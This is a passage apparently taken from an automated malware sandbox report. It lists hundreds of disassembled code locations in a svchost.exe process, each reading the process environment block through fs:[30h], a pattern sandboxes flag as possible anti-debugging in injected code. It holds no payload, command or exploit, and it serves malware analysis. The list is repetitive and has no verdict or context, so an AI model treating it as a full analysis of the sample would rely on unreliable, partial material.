            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]
